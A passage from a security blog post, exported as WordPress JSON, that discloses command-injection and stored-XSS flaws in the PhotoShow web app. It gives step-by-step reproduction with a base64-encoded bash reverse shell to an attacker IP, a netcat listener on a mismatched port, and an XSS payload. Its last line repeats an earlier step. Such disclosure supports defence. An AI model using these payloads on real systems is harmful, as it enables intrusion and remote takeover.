- Log in as a user with the administrative permissions.<\/li>
- Navigate to the admin settings page.<\/li>
- Click on \u2018Edit settings\u2019 tab.<\/li>
- Insert the following payload into the \u201cFFmpeg path\u201d\u00a0field. Embed your IP address and port into the Base64 encoded string.<\/li><\/ol>\n\n\n\n
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMy80NDQ0IDA+JjE= | base64 -d > \/tmp\/1.sh ;\/bin\/bash \/tmp\/1.sh<\/pre>\n\n\n\n
- Click on the first \u2018Submit\u2019 button. The web application should send the request as the following image illustrates:<\/li><\/ol>\n\n\n\n
![\"\"](\"https:\/\/lyhinslab.org\/wp-content\/uploads\/2021\/07\/image-1.png\")
<\/figure>\n\n\n\n6. On the attacker’s machine, turn on the netcat listener:<\/p>\n\n\n\n
nc -nvlp 9999<\/pre>\n\n\n\n
7. Upload any short video through the built-in functionality, and get a shell.\u00a0<\/p>\n\n\n\n
![\"\"](\"https:\/\/lyhinslab.org\/wp-content\/uploads\/2021\/07\/image.jpeg\")
<\/figure>\n\n\n\nStored Cross-Site Scripting (XSS)<\/h3>\n\n\n\n
Severity: 9.1 (Critical)<\/p>\n\n\n\n
CVSS :3.0\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H<\/p>\n\n\n\n
Steps to reproduce<\/h4>\n\n\n\n
- Log in as a user with the administrative permissions.<\/li>
- Navigate to the admin settings page.<\/li>
- Click on “Edit settings” tab.<\/li>
- Click on the first “Submit” button.\u00a0<\/li>
- Intercept the request with the Burp Suite, send the mentioned request to the repeater, and modify as the following screenshot illustrates:<\/li><\/ol>\n\n\n\n
![\"\"](\"https:\/\/lyhinslab.org\/wp-content\/uploads\/2021\/07\/image-2.png\")
<\/figure>\n\n\n\nNamely, insert the following payload in the “user_theme” body parameter:<\/p>\n\n\n\n
'><img src=X onerror=alert(document.location)><\/pre>\n\n\n\n
6. Navigate to the root page of the web application.<\/p>\n\n\n\n
![\"\"](\"https:\/\/lyhinslab.org\/wp-content\/uploads\/2021\/07\/image.png\")
<\/figure>\n\n\n\nLL advises to all the researchers do not break real applications<\/em>\u00a0illegally. This fun leads to broken businesses and lives, and, most likely, will not make an attacker really rich.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"
A bit outdated, nevertheless is beautiful in terms of ethical hacking – photoshow is an open source web application with 490 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-476","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/476","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/comments?post=476"}],"version-history":[{"count":0,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/476\/revisions"}],"wp:attachment":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/media?parent=476"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/categories?post=476"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/tags?post=476"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- Click on the first \u2018Submit\u2019 button. The web application should send the request as the following image illustrates:<\/li><\/ol>\n\n\n\n